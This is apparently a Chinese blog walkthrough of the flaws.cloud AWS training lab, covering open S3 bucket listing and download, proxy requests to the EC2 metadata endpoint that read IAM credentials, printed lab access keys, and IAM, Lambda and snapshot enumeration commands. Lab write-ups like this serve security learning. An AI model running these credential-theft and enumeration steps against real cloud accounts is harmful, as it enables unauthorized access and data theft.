借助网上提供的漏洞环境,了解了下AWS S3 Bucket在配置不当时产生的安全问题,包括未授权访问、秘钥泄露等安全问题。
前言
amazon (S3) 是一个公开的服务,Web 应用程序开发人员可以使用它存储数字资产,包括图片、视频、音乐和文档。 S3 提供一个 RESTful API 以编程方式实现与该服务的交互。
实验环境
信息收集
查看托管服务器
1 2
| #nslookup 54.231.184.255 255.184.231.54.in-addr.arpa name = s3-website-us-west-2.amazonaws.com.
|
可访问:http://flaws.cloud.s3-website-us-west-2.amazonaws.com/
未授权访问
1
| aws s3 ls s3://flaws.cloud --no-sign-request --region us-west-2
|
1
| http://flaws.cloud.s3.amazonaws.com/
|
1
| aws s3 --profile YOUR_ACCOUNT ls s3://level2.flaws.cloud
|
下载文件(单个)
1
| aws s3 cp s3://flaws.cloud/secret.html /home --no-sign-request --region us-west-2
|
下载文件(全部)
1
| aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request --region us-west-2
|
S3存储器四项权限
1
| List, Upload/Delete, View Parmissions, Edit Parmissions
|
可利用代理的情况下获取元数据
1 2
| curl http://169.254.169.254/ http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/
|
1 2
| curl http://169.254.169.254/latest/meta-data/iam/security-credentials/flaws/ http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
|
秘钥泄露
泄露秘钥
1 2
| access_key AKIAJ366LIPB4IJKT7SA secret_access_key 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
|
通过秘钥连接aws存储器
1
| aws configure --profile flaws
|
存在token的话在~/.aws/credentials文件下加入toeken信息,aws_session_token
1
| aws --profile flaws s3 ls
|
存在权限问题会出现Access Denied错误,可指定bucket访问,出现InvalidAccessKeyId error则说明需要token信息
低权限bucket直接读取
1 2
| aws --profile lv6 s3 sync s3://flaws.cloud/ . aws --profile lv6 s3 cp s3://flaws.cloud/robots.txt .
|
获取账户ID
1 2 3 4 5 6
| #aws --profile flaws sts get-caller-identity { "Account": "975426262029", "UserId": "AIDAJQ3H5DC3LEG2BKSLC", "Arn": "arn:aws:iam::975426262029:user/backup" }
|
1 2 3 4 5 6 7 8 9 10
| #aws --profile lv6 iam get-user { "User": { "UserName": "Level6", "Path": "/", "CreateDate": "2017-02-26T23:11:16Z", "UserId": "AIDAIRMDOSCWGLCDWOG6A", "Arn": "arn:aws:iam::975426262029:user/Level6" } }
|
已知用户名获取配置的策略
1 2 3 4 5 6 7 8 9 10 11 12 13
| #aws --profile lv6 iam list-attached-user-policies --user-name Level6 { "AttachedPolicies": [ { "PolicyName": "list_apigateways", "PolicyArn": "arn:aws:iam::975426262029:policy/list_apigateways" }, { "PolicyName": "MySecurityAudit", "PolicyArn": "arn:aws:iam::975426262029:policy/MySecurityAudit" } ] }
|
获取策略的版本id
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
| #aws --profile lv6 iam get-policy --policy-arn arn:aws:iam::975426262029:policy/list_apigateways { "Policy": { "PolicyName": "list_apigateways", "Description": "List apigateways", "PermissionsBoundaryUsageCount": 0, "CreateDate": "2017-02-20T01:45:17Z", "AttachmentCount": 1, "IsAttachable": true, "PolicyId": "ANPAIRLWTQMGKCSPGTAIO", "DefaultVersionId": "v4", "Path": "/", "Arn": "arn:aws:iam::975426262029:policy/list_apigateways", "UpdateDate": "2017-02-20T01:48:17Z" } }
|
已知version id,获取策略具体信息
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20
| # aws --profile lv6 iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4 { "PolicyVersion": { "CreateDate": "2017-02-20T01:48:17Z", "VersionId": "v4", "Document": { "Version": "2012-10-17", "Statement": [ { "Action": [ "apigateway:GET" ], "Resource": "arn:aws:apigateway:us-west-2::/restapis/*", "Effect": "Allow" } ] }, "IsDefaultVersion": true } }
|
列出可调用函数,可获取函数名称
1 2 3 4
| aws --region us-west-2 --profile level6 lambda list-functions aws --region us-west-2 --profile level6 lambda get-policy --function-name Level6 aws --profile level6 --region us-west-2 apigateway get-stages --rest-api-id“s33ppypa75” 利用stageName、region 以及函数名,拼凑出完整的 API 路径。
|
列出快照
1 2
| aws --profile flaws ec2 describe-snapshots aws --profile flaws ec2 describe-snapshots --owner-id 975426262029
|
创建快照卷
1
| aws --profile YOUR_ACCOUNT ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
|
将快照挂载到aws服务器,需要aws账号,暂未进行。。
参考
1
| https://www.freebuf.com/articles/system/129667.html
|